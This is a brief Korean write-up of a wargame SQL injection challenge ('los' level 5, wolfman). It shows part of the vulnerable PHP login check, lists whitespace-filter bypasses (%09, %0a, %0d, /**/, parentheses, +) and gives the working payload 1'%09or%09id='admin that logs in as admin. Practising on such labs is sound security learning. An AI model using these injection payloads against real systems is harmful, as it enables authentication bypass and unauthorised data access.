los 5번

query : {$query}

"; 
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "
Hello {$result[id]}
"; 
  if($result['id'] == 'admin') solve("wolfman"); 
  highlight_file(__FILE__); 
?>

공백 우회

1. Tab %09

2. \n %0a

3. %0d

4. /**/

5. ()

6. +

여기서는 1, 2, 3, 4번 다 적용되었다.

1'%09or%09id='admin

query : select id from prob_wolfman where id='guest' and pw='1' or id='admin'